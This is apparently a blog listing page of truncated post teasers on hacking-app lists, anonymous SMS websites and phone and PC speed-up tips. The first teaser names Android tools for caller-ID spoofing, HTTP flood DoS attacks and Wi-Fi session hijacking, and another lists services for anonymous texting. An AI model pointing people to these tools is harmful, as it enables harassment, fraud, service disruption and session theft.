These are the top 10 Android Apps That Turn Your Phone into a Hacking Device.

These are the top 10 Android Apps That Turn Your Phone into a Hacking Device. 1.SpoofApp SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009. 2.Andosid The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 3.Faceniff Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks. 4.Nmap Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating...

🎁 How To Increase RAM Using USB/Pendrive In Windows 8 & 10

&#127873; How To Increase RAM Using USB/Pendrive In Windows 8 & 10 ➖➖➖➖➖➖➖➖➖➖➖➖ 1⃣ First of all, insert your Pen Drive. Then open My Computer and Right click > Then open Properties. 2⃣ Now Properties window will appear, then click on Advanced system settings from a left side. 3⃣ Then in Advanced Tab click on Settings Button appear in Performance tab. 4⃣  Again new window will appear then click on AdvancedTab. 5⃣ In Advanced Tab there is an option of the Virtual Memory box, Then click on Change Button. 6⃣ Now uncheck the box of Automatically Manage Page size feature. Then in Custom Size, add your Pen Drive current same in below format. Now Add same Value in both boxes and click on Apply button. Note:❗️ If Your Pen Driv...

HOW TO SEND ANONYMOUS SMS TO ANY NUMBER

▪️HOW TO SEND ANONYMOUS SMS TO ANY NUMBER ▪️ Till now you had only try sending SMS using your mobile number or using some of online website that first takes your personal information and then display it on the receiver of the message. But if i give you a way by which you can send SMS without entering any details that is anonymously and receiver will not identify that who had actually send the SMS. So we are here with the way for How To Send Anonymous SMS To Any Number. The method is very simple and straight just follow the below method to proceed. The method is actually based on sending SMS using some online websites that will allow you to send SMS without entering any personal details. So just have a look on the websites to send free Anonymous SMS. List of Websites To Send Anonymous SMS To Any Number :-   ▪️1. Seasms.com   ▪️2. Spicesms.com   ▪️3. Smsti.in   ▪️4. Sendanonymoussms...

🎁 How To Speed Up Your Android Device Without Rooting

&#127873; How To Speed Up Your Android Device Without Rooting ➖➖➖➖➖➖➖➖➖➖➖➖ &#128309; Steps To Speed Up Android Without Rooting: There are many factors that can influence your Android speed. And the methods we are going to discuss here are for non-rooted smartphones. These methods are also for those who don’t want to root their smartphone. 1⃣ Manage Your Internal Storage The major thing in an Android is its internal storage. It is the physical memory that an Android uses to store all the apps in it. So it’s always better to choose an Android that is having perfect internal storage capacity and second thing is to manage your internal storage perfectly. 2⃣ Remove Bloatware If you have RAM above 2GB then you don’t need to worry about bloatware. However, if you have less than 2GB of RAM then you need to remove the bloatware. It will show some positive effect...